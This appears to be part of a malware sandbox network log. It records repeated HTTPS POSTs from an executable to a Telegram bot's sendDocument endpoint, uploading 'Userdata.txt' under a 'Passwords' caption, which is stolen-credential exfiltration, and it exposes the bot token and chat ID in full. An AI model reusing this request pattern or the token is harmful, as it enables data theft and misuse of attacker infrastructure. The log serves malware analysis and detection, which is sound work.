2025-01-10 20:54:15 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 34 36 30 35 65 39 62 65 66 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd334605e9befdContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:15 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:15 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:15 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44750,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542455,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50028	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:17 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd335d7b5fd182 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:17 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 35 64 37 62 35 66 64 31 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd335d7b5fd182Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:17 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:17 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:17 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44751,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542457,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50030	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:18 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3373912f7e9c Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:18 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 33 39 31 32 66 37 65 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3373912f7e9cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:19 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:18 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:19 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 35 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44752,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542458,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50032	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:20 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd338ae1dad58b Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:20 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 61 65 31 64 61 64 35 38 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd338ae1dad58bContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:20 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:20 GMT Content-Type: application/json Content-Length: 537 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:20 UTC	537	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44753,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542460,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50034	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:22 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33a36afe00b8 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:22 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 61 33 36 61 66 65 30 30 62 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33a36afe00b8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:22 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:22 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:22 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44754,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542462,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50036	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:23 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33bd2b6aed7d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:23 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 64 32 62 36 61 65 64 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33bd2b6aed7dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:23 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:23 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:23 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44755,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542463,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50038	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:25 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33d58fba2b56 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:25 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 64 35 38 66 62 61 32 62 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33d58fba2b56Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:25 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:25 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:25 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 35 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 36 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44756,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542465,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50040	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:27 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33f447b5911d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:54:27 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 34 34 37 62 35 39 31 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33f447b5911dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:27 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:27 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
